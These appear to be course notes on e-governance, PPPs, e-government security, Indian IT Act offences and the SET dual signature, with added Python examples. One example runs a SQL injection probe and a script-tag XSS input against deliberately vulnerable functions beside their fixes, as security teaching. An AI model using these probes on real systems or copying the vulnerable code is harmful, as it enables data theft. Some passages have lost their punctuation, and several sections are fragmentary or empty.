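The two properties argued over above, offline card-to-card transfer and the bounded on-card log, in a simplified model written for these notes as an added example (it is not Mondex's protocol). Value moves directly between two purses with no bank online, and each purse keeps only a rolling log of its last ten transactions, so once more than ten happen before the next upload the oldest entries are overwritten: the audit gap the critics describe. Value packets are integrity-checked with an HMAC under a scheme key shared by all cards, an assumption standing in for the real cards' mutual authentication and tamper-resistant hardware, and a receiver refuses to credit the same packet twice. Keys, card IDs and amounts are constructed.

```python
"""Offline purse-to-purse transfer with a rolling transaction log (added example)."""
from __future__ import annotations
import hashlib
import hmac
from collections import deque

LOG_SIZE = 10   # "rolling 10 transactions"


class Purse:
    def __init__(self, card_id: str, scheme_key: bytes, balance_cents: int = 0):
        self.card_id = card_id
        self._key = scheme_key
        self.balance = balance_cents
        self.seq = 0                              # per-card debit sequence number
        self.log: deque = deque(maxlen=LOG_SIZE)  # oldest entry is dropped silently
        self.total_logged = 0                     # every entry ever appended
        self.uploaded = 0                         # entries the bank has received
        self._seen: set[tuple[str, int]] = set()  # (sender, seq) already credited

    def _record(self, entry: tuple) -> None:
        self.log.append(entry)
        self.total_logged += 1

    def _mac(self, payload: bytes) -> bytes:
        return hmac.new(self._key, payload, hashlib.sha256).digest()

    def send(self, to_id: str, amount: int) -> dict:
        """Debit this purse and emit a MAC-protected value packet for the other card."""
        if amount <= 0 or amount > self.balance:
            raise ValueError("insufficient value on card")
        self.seq += 1
        self.balance -= amount
        payload = f"{self.card_id}>{to_id}:{amount}:{self.seq}".encode()
        self._record(("debit", to_id, amount, self.seq))
        return {"payload": payload, "mac": self._mac(payload)}

    def receive(self, packet: dict) -> bool:
        """Credit only a genuine, correctly addressed, not-yet-seen packet."""
        if not hmac.compare_digest(self._mac(packet["payload"]), packet["mac"]):
            return False
        src, rest = packet["payload"].decode().split(">")
        to_id, amount, seq = rest.split(":")
        if to_id != self.card_id or (src, int(seq)) in self._seen:
            return False
        self._seen.add((src, int(seq)))
        self.balance += int(amount)
        self._record(("credit", src, int(amount), int(seq)))
        return True

    def upload_to_bank(self) -> tuple[list, int]:
        """Return entries not yet uploaded and how many were lost to overflow."""
        new = self.total_logged - self.uploaded
        lost = max(0, new - len(self.log))        # overwritten before upload
        entries = list(self.log)[-new:] if new else []
        self.uploaded = self.total_logged
        return entries, lost


def demo() -> dict:
    """16 offline payments, one replay attempt, then the first upload."""
    key = b"constructed-scheme-key"
    a, b = Purse("A", key, balance_cents=5000), Purse("B", key)
    for _ in range(15):
        b.receive(a.send("B", 100))
    pkt = a.send("B", 100)
    first, replay = b.receive(pkt), b.receive(pkt)
    entries, lost = a.upload_to_bank()
    return {"a_balance": a.balance, "b_balance": b.balance,
            "replay_rejected": first and not replay,
            "uploaded": len(entries), "lost": lost}
```

The balances stay consistent because each purse enforces its own rules, but the bank only ever sees ten of the sixteen transfers; the six overwritten entries are exactly the data the text says may be lost before it can be retrieved, and no amount of server-side checking can recover them.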

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define this term to suit their own aims and objectives. Sometimes the term 'e-government' is also used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance or electronic governance. The word "electronic" in the term e-governance implies technology driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, and integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B) and government-to-government (G2G), as well as back office processes and interactions within the entire government framework. Through e-governance, government services will be made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally four basic models are available: government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance:

Both terms are treated as the same; however, there is some difference between the two. E-government is the use of ICTs in public administration, combined with organizational change and new skills, to improve public services and democratic processes and to strengthen support to the public. The problem with this definition, if it is to be congruent with a definition of e-governance, is that there is no provision for governance of ICTs. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these concerns. So the perspective of e-governance is the use of the technologies that both help governing and have to be governed. The Public-Private Partnership (PPP) based e-governance projects are hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India on PPP based e-governance projects. Each project had mammoth state wide area networks in these states.

E-governance is the future many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended to reach the desired individual have been delivered. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budget for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government and enhance citizen economic and social opportunities, so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE

(diagram)

A suggested architecture for e-Governance is shown in the diagram, where it is illustrated that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department, or from anywhere through the network. This is because of the characteristics of CORBA: it is location transparent, language independent, implementation independent and Operating System independent. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit CORBA specifications, any new Web application, or even a database environment using Oracle etc. Seamless interconnection, and thereby effective utility of the entire system of e-Governance, is possible if the middleware is designed to have the necessary services like Transactions, Data Base Management, Messaging and Naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as the Distributed Computing Environment (DCE), the Kerberos Protocol and the Generic Security Service (GSS) API. While these technologies are heavily weighted, Public Key Security with the Secure Sockets Layer (SSL) is popular with Internet based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows.

G2G (Government to Government)

In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.

G2C (Government to Citizens)

In this case, an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. service centre, unattended kiosk or from one's home/workplace) and how to interact with the government (e.g. through internet, fax, telephone, email, face-to-face, etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here e-Governance tools are used to aid the business community (providers of goods and services) to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. The G2B initiatives can be transactional, such as in licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment to businesses to enable them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand and increases satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B): Refers to the conducting of transactions between government bodies and business via the internet.

Business to government (B2G): Professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

• Agreement between Government and the Private Sector for the Provision of a Public Good or Service by the Latter

• Generally, but not always, involving:

  o Long Term Contracts

  o User Charges and/or Payments flowing between the Parties

  o Shared Investments, but Mainly Private

  o Risk Sharing by the Parties

• Must be a Partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves objectives of the individual partners.

Why do them?

• Fiscal Head Room

• As a Way of Financing the Project

• Separate Policy & Regulation from Operations

• Make the Good or Service Available

• Pay for Performance and Output

• Introduce Competition, For and In the Market

The Need to Set the Right Priorities:

Four Basic Dimensions of P3

Although each is unique, all P3s include four basic characteristics:

Shared goals

Shared resources (time, money, expertise, people)

Shared risks

Shared benefits

Benefits:

Expedited project completion

Project cost savings

Improved quality

Use of private resources

Access to new sources of private capital

Two Major Steps:

Crafting the Partnership

Implementing the Partnership

Project Management - Six Distinct Phases

1. Genesis

What's the need?

What's driving the need (rationale)? Facility non-compliance, natural disaster, budget deficit

Is there a need for a Public/Private Partnership?

Preliminary Project Definition

2. Feasibility

Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?

Market Research

Economic/Financial Analysis

Program, Budget and Schedule

Risk Analysis

3. Plan and Test

Final project definition

What is the best way to complete the project?

Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback, and economics?

Master Schedule/Budget

Political Climate

Any potential "fatal flaws" that could derail the project?

4. Procurement and Contracting

How do you choose and contract with the best-value private partner?

What's the best delivery method? Design-Bid-Build, Design-Build, Finance-Design-Build

What do current statutes allow?

Procurement Approach: Sole Source, RFP, Low Bid

Risk Allocation between Public and Private Partners

Structuring of Contract: Risks and Rewards

5. Implement

Environmental

Design

Permitting

Construction

Commissioning and Administration

6. Operate

Startup

Monitoring

Assessment

Enhancement

Contract Modifications

Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms), and a high level of comfort with ICT by citizens and businesses. Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have in the data security of this service.

2. INFORMATION SECURITY

A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

understanding an organization's information security requirements and the need to establish policy and objectives for information security;

implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;

monitoring and reviewing the performance and effectiveness of the ISMS;

continual improvement based on objective measurement.

Data security requires a set of security requirements:

Authentication: capability to identify who is using the services (person or software program); the process of verifying that you are who you say you are.

Authorization: capability to give access rights to resources; the process of verifying that someone has the rights to do what she is trying to do.

Confidentiality: capability to prevent unauthorized access to information.

Integrity: capability to prevent information from unauthorized modification, and ensuring that information can be relied upon and is accurate and complete.

Traceability: capability to chronologically interrelate any transaction to a person or system that performed the action, in a way that is verifiable.

Non-repudiation: capability to prevent the intervening person or system in an event or action from denying or challenging their participation in the event.
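The requirement list above, shown as the checks a single citizen-record endpoint would perform, in an added example written for these notes (not any agency's software). A signed session token provides authentication; a role table decides authorization; the record is returned only to its owner or to a clerk (confidentiality); and every request, allowed or denied, is appended to a hash-chained, HMAC-sealed audit log, which gives integrity and traceability because no entry can be altered, removed or reordered without breaking the chain. Non-repudiation proper needs per-user digital signatures rather than a key the service itself holds, so this example stops at a tamper-evident trail. The keys, users, roles and records are all constructed.

```python
"""Authentication, authorization and a tamper-evident audit trail (added example)."""
from __future__ import annotations
import hashlib
import hmac
import json
import time

SESSION_KEY = b"constructed-session-signing-key"   # held by the auth server
AUDIT_KEY = b"constructed-audit-sealing-key"       # held by the audit service

ROLES = {"alice": "citizen", "bob": "citizen", "carol": "clerk"}
PERMISSIONS = {"citizen": {"read_own"}, "clerk": {"read_own", "read_any"}}
RECORDS = {"alice": {"tax_id": "T-001"}, "bob": {"tax_id": "T-002"}}


def issue_token(user: str) -> str:
    """Auth server issues 'user.HMAC(user)' after checking the user's credentials."""
    tag = hmac.new(SESSION_KEY, user.encode(), hashlib.sha256).hexdigest()
    return f"{user}.{tag}"


def authenticate(token: str) -> str | None:
    """Return the user name if the token's tag verifies, else None."""
    user, _, tag = token.partition(".")
    expected = hmac.new(SESSION_KEY, user.encode(), hashlib.sha256).hexdigest()
    return user if tag and hmac.compare_digest(expected, tag) else None


class AuditLog:
    """Hash-chained entries: each entry's seal covers the previous entry's seal."""

    def __init__(self):
        self.entries: list[dict] = []
        self._prev = "0" * 64

    def append(self, actor: str, action: str, target: str, outcome: str) -> None:
        body = {"ts": time.time(), "actor": actor, "action": action,
                "target": target, "outcome": outcome, "prev": self._prev}
        canon = json.dumps(body, sort_keys=True).encode()
        seal = hmac.new(AUDIT_KEY, canon, hashlib.sha256).hexdigest()
        self.entries.append({**body, "seal": seal})
        self._prev = seal

    def verify(self) -> bool:
        """Recompute every seal in order; any edit or removal breaks the chain."""
        prev = "0" * 64
        for e in self.entries:
            body = {k: v for k, v in e.items() if k != "seal"}
            if body["prev"] != prev:
                return False
            canon = json.dumps(body, sort_keys=True).encode()
            seal = hmac.new(AUDIT_KEY, canon, hashlib.sha256).hexdigest()
            if not hmac.compare_digest(seal, e["seal"]):
                return False
            prev = e["seal"]
        return True


AUDIT = AuditLog()


def read_record(token: str, subject: str) -> dict | None:
    """Endpoint: authenticate, authorize, serve, and record the outcome."""
    actor = authenticate(token)
    if actor is None:
        AUDIT.append("<unauthenticated>", "read", subject, "denied: bad token")
        return None
    needed = "read_own" if actor == subject else "read_any"
    if needed not in PERMISSIONS.get(ROLES.get(actor, ""), set()):
        AUDIT.append(actor, "read", subject, "denied: not authorized")
        return None
    AUDIT.append(actor, "read", subject, "ok")
    return RECORDS.get(subject)
```

Denied requests are logged as deliberately as successful ones; a trail that records only successes cannot support the traceability requirement when an incident is investigated.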

Examples of organizational and technical measures to prevent unauthorized access and processing are:

Protecting premises, equipment and systems software, including input-output units.

Protecting software applications used to process personal data.

Preventing unauthorized access to personal data during transmission thereof, including transmission via telecommunication means and networks.

Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data.

Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and the person responsible, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data.

Despite trusted security and privacy measures constituting a crucial success factor for e-Government, this has not yet been addressed: as the UN 2012 Survey shows, only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3. INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Examples of cyber attacks include techniques like packet sniffers, probes, malware, Internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis;

maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness;

continually improve its control environment;

effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. A SQL injection attack can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.
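The two vulnerabilities just named, each shown as the defect beside its fix, in an added example written for these notes (the sample table, names and inputs are constructed). For SQL injection, building the query by string formatting lets input change the query's structure, while a bound parameter keeps it data; for XSS, echoing a request parameter into HTML unescaped lets input become markup, while escaping on output keeps it text. The demo runs both forms against the same constructed input so the difference is visible in the returned values.

```python
"""SQL injection and reflected XSS: defect and fix side by side (added example)."""
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed citizen table, in memory."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE citizens (name TEXT, tax_id TEXT)")
    conn.executemany("INSERT INTO citizens VALUES (?, ?)",
                     [("alice", "T-001"), ("bob", "T-002"), ("carol", "T-003")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    """Defect: the name is spliced into the SQL text, so quotes in it become syntax."""
    query = f"SELECT name, tax_id FROM citizens WHERE name = '{name}'"
    return conn.execute(query).fetchall()


def lookup_fixed(conn: sqlite3.Connection, name: str) -> list:
    """Fix: a bound parameter; the driver never interprets it as SQL."""
    return conn.execute(
        "SELECT name, tax_id FROM citizens WHERE name = ?", (name,)).fetchall()


def render_vulnerable(query: str) -> str:
    """Defect: reflected input is inserted into the page as raw HTML."""
    return f"<p>Results for: {query}</p>"


def render_fixed(query: str) -> str:
    """Fix: escape on output so <, >, &, and quotes are displayed, not interpreted."""
    return f"<p>Results for: {html.escape(query)}</p>"


def demo() -> dict:
    conn = make_db()
    # Constructed probe: a quote that closes the literal, then an always-true clause.
    probe = "x' OR '1'='1"
    vuln_rows = lookup_vulnerable(conn, probe)   # every row: the WHERE is now a tautology
    fixed_rows = lookup_fixed(conn, probe)       # no row: no citizen has that literal name
    markup = "<script>alert(1)</script>"
    return {
        "vulnerable_row_count": len(vuln_rows),
        "fixed_row_count": len(fixed_rows),
        "normal_lookup": lookup_fixed(conn, "bob"),
        "vulnerable_html_has_tag": "<script>" in render_vulnerable(markup),
        "fixed_html_has_tag": "<script>" in render_fixed(markup),
    }
```

Both fixes are local and cheap, which is the point of the text's "could be avoided": parameterised queries and output escaping belong in the data-access and template layers so that no individual endpoint has to remember them.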

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained on cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.


CYBER CRIME AND LAWS

The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment

or any offence against morality social order or any unjust or shameful act The ldquoOffence

is defined in the Code of Criminal Procedure to mean as an act or omission made

punishable by any law for the time being in force

Cyber Crime is emerging as a serious threat World wide governments police

departments and intelligence units have started to react

Cyber Crime is a term used to broadly describe criminal activity in which computers or

computer networks are a tool a target or a place of criminal activity and include everything

from electronic cracking to denial of service attacks It is also used to include traditional

crimes in which computers or networks are used to enable the illicit activity

Computer crime mainly consists of unauthorized access to computer systems data

alteration data destruction theft of intellectual property Cyber crime in the context of

national security may involve hacking traditional espionage or information warfare and

related activities

Pornography Threatening Email Assuming someones Identity Sexual Harassment

Defamation Spam and Phishing are some examples where computers are used to commit

crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking

are examples where computers become target of crime

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking had witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune. This is an issue that has not been tackled in the IT ACT 2000.

Phishing

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions, requesting them to enter their Username, Password or other personal information to access their Account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.

Vishing

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "Voice" and "phishing". Vishing exploits the public's trust in landline telephone services. Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base:

- 121 Million Internet Users
- 65 Million Active Internet Users, up by 28% from 51 million in 2010
- 50 Million users shop online on Ecommerce and Online Shopping Sites
- 46+ Million Social Network Users
- 346 million mobile users had subscribed to Data Packages

CYBER LAW

(1) Whoever, with the intent to cause or knowing that he is likely to cause wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means, commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever, without permission of the owner of the computer:

- Secures access
- Downloads, copies or extracts any data, computer database or any information
- Introduces or causes to be introduced any virus or contaminant
- Disrupts or causes disruption
- Denies or causes denial of access to any person
- Provides any assistance to any person to facilitate access
- Charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section – 43

- Destroys, deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means
- Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage

"If any person dishonestly or fraudulently does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to three years, or with fine which may extend to five lakh rupees, or with both." [S66]

S66A – Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

- any information that is grossly offensive or has menacing character; or
- any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or
- any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages,

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C – Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D – Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E – Punishment for violation of privacy

"Whoever, intentionally or knowingly captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67A – Punishment for publishing or transmitting of material containing sexually explicit act, etc., in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67C – Preservation and retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."

IT ACT

The Information Technology Act, 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It got Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions –

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1. Legal recognition of electronic documents
2. Legal recognition of digital signatures
3. Offences and contraventions
4. Justice dispensation systems for cybercrimes

Offences –

Section 65 – Tampering with computer source documents: intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force.
Punishment: imprisonment up to three years, or/and with fine up to 2 lakh rupees.

Section 66 – Hacking.
Punishment: imprisonment up to three years, or/and with fine up to 5 lakh rupees.

Section 66-A – Sending offensive messages through electronic means: sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages.
Punishment: imprisonment up to three years and with fine.

Criticisms –

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some of the cyber law observers have criticized the amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil liberties of Indians. There has also been appreciation of the amendments from many observers because they address the issue of Cyber Security.

Section 69 empowers the Central Government/State Government and its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption) under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.


Step 3: Finally, he compares the two terms H[H[PI] || H[OI]] and DRSA[DS | keypublic_sign_cardholder]. They should be the same if the transmitted DS has not been changed; otherwise the order is not valid.

The payment gateway is provided with PI, H[OI] and DS.

By using the dual signature method, each cardholder can link OI and PI while releasing only the necessary information to the relevant party. If either the OI or PI is changed, the dual signature will no longer be valid.
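The construction and both verification paths described above, as an added example that is not code from the original notes. It assumes SHA-256 as the hash H and uses textbook (unpadded) RSA over a constructed key built from two small Mersenne primes so that it runs offline with the standard library only; that key is for illustration, not for real use, and real SET signatures also carried padding and certificates. The order and payment messages are constructed samples.

```python
# Added example (not from the original notes): the SET dual signature.
# H is SHA-256.  The RSA key is constructed from p = 2^61 - 1 and q = 2^89 - 1
# (both prime) and used as textbook RSA on a reduced digest, so it runs
# offline.  It is an illustration only; real deployments use padded RSA.
import hashlib

P = (1 << 61) - 1
Q = (1 << 89) - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))   # private exponent (Python 3.8+)


def H(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()


def rsa_sign(digest: bytes) -> int:
    """DS = digest^d mod n (digest reduced mod n so it fits the demo key)."""
    return pow(int.from_bytes(digest, "big") % N, D, N)


def rsa_verify(signature: int, digest: bytes) -> bool:
    """Compare DRSA[DS | public key] with the digest recomputed by the verifier."""
    return pow(signature, E, N) == int.from_bytes(digest, "big") % N


def make_dual_signature(order_info: bytes, payment_info: bytes):
    """Cardholder: PIMD = H[PI], OIMD = H[OI], DS = sign(H[PIMD || OIMD]).

    Returns (DS, PIMD, OIMD); the merchant gets OI, PIMD, DS and the
    payment gateway gets PI, OIMD, DS, so neither sees the other's data.
    """
    pimd = H(payment_info)
    oimd = H(order_info)
    ds = rsa_sign(H(pimd + oimd))
    return ds, pimd, oimd


def merchant_verify(order_info: bytes, pimd: bytes, ds: int) -> bool:
    """Merchant recomputes H[H[PI] || H[OI]] from OI and the supplied H[PI]."""
    return rsa_verify(ds, H(pimd + H(order_info)))


def gateway_verify(payment_info: bytes, oimd: bytes, ds: int) -> bool:
    """Gateway recomputes H[H[PI] || H[OI]] from PI and the supplied H[OI]."""
    return rsa_verify(ds, H(H(payment_info) + oimd))


def demo() -> dict:
    oi = b"order:42 item:book qty:1 price:12.50"          # constructed OI
    pi = b"card:demo-0000 amount:12.50 merchant:M1"       # constructed PI
    ds, pimd, oimd = make_dual_signature(oi, pi)
    return {
        "merchant_ok": merchant_verify(oi, pimd, ds),
        "gateway_ok": gateway_verify(pi, oimd, ds),
        # A changed OI or PI breaks the link: the signature no longer verifies.
        "tampered_oi": merchant_verify(oi.replace(b"12.50", b"1.50"), pimd, ds),
        "tampered_pi": gateway_verify(pi.replace(b"12.50", b"99.00"), oimd, ds),
    }


if __name__ == "__main__":
    print(demo())
```

Each party verifies the same signature from a different half of the data plus the other half's digest, which is what lets the cardholder prove the two messages belong together without disclosing card details to the merchant or the order contents to the gateway.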

DIGITAL ENVELOPE –


SET PROTOCOL –

The SET protocol has four phases: initiation, purchase, authorization and capture.

- First, the cardholder sends a purchase initiation request to the merchant for initializing the payment. Then the merchant returns a response message to the cardholder.
- In the second phase, the cardholder sends the purchase order together with the payment instruction to the merchant.
- In the third phase, the merchant obtains the authorization from the issuer via the payment gateway.
- Finally, the merchant requests a money transfer to its account.

E-CASH

